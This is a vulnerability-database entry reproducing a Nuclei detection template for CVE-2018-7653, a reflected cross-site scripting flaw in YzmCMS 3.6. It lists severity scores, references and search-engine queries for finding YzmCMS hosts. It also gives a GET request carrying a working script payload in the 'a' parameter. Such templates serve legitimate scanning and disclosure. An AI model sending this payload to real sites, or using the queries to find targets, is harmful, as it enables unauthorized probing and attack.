Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-7653
HistoryAug 07, 2023 - 5:55 p.m.

YzmCMS v3.6 - Cross-Site Scripting

2023-08-0717:55:47
ProjectDiscovery
github.com
1
cve
cve2018
packetstorm
yzmcms
cross-site scripting

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.008 Low

EPSS

Percentile

81.7%

In YzmCMS 3.6, index.php has XSS via the a, c, or m parameter.

id: CVE-2018-7653

info:
  name: YzmCMS v3.6 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: In YzmCMS 3.6, index.php has XSS via the a, c, or m parameter.
  remediation: |
    To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
  reference:
    - https://packetstormsecurity.com/files/147065/YzmCMS-3.6-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-7653
    - https://github.com/ponyma233/YzmCMS/blob/master/YzmCMS_3.6_bug.md
    - https://github.com/anquanquantao/iwantacve
    - https://github.com/5ecurity/CVE-List
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-7653
    cwe-id: CWE-79
    epss-score: 0.00797
    epss-percentile: 0.81581
    cpe: cpe:2.3:a:yzmcms:yzmcms:3.6:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: yzmcms
    product: yzmcms
    shodan-query:
      - title:"YzmCMS"
      - http.title:"yzmcms"
    fofa-query:
      - title="YzmCMS"
      - title="yzmcms"
    google-query: intitle:"yzmcms"
  tags: cve,cve2018,packetstorm,yzmcms,cms,xss

http:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?m=search&c=index&a=initxqb4n<img%20src%3da%20onerror%3dalert(document.domain)>cu9rs&modelid=1&q=tes'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src=a onerror=alert(document.domain)>'
          - 'YzmCMS'
        condition: and
        case-insensitive: true

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a004630440220054d38cc9cefddeceb4174fd435c029b0bd07f818482ccc8ef6c85e142223a1702200e8d3f162339a76588749e9c816121f27d41423f7fc527183ae443dc9600fdff:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.008 Low

EPSS

Percentile

81.7%